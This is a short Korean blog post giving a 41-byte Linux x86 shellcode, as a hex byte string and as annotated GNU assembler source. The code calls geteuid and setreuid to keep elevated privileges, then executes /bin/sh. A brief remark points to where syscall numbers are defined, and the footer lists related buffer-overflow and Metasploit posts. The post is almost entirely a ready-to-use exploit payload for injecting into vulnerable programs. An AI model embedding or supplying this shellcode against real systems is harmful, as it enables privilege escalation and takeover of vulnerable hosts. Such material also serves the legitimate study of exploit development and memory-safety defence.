Linux-x86 /bin/sh 쉘코드 (41바이트)

2010/03/21 21:35
Leave a Comment 

/*
\x31\xc0\xb0\x31\xcd\x80\x89\xc1\x89\xc3\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80
*/

.globl    main

main:
    xor    %eax, %eax
    mov    $0x31, %al
    int    $0x80            # geteuid()

    mov    %eax, %ecx
    mov    %eax, %ebx
    xor    %eax, %eax
    mov    $0x46, %al
    int    $0x80            # setreuid(%eax, %eax)

    xor    %eax, %eax
    push    %eax
    push    $0x68732f2f
    push    $0x6e69622f
    mov    %esp, %ebx
    push    %eax
    push    %ebx
    mov    %esp, %ecx
    xor    %edx, %edx
    mov    $0xb, %al
    int    $0x80            # execve("/bin/sh", "/bin/sh", NULL)


예전에 gas로 작성했던 쉘코드입니다. system call 함수의 번호는 /usr/include/asm/unistd_32.h 에서 확인할 수 있습니다.
크리에이티브 커먼즈 라이센스
Creative Commons License

"0x03 Linux RCE" 분류의 다른 글

The Linux Kernel Module Programming Guide v2.62011/11/20
BOF에 의한 연속적인 함수 호출 - 루피의 모험2011/03/01
linux/x86/shell_reverse_tcp2 on Metasploit2011/02/24
함수 에필로그(leaveret) 에 의한 스택 변화2011/02/22
The Lord of The BOF - Redhat 클리어!!2011/02/13

6l4ck3y3 0x03 Linux RCE , , , ,

Trackback Address:http://hisjournal.net/blog/trackback/314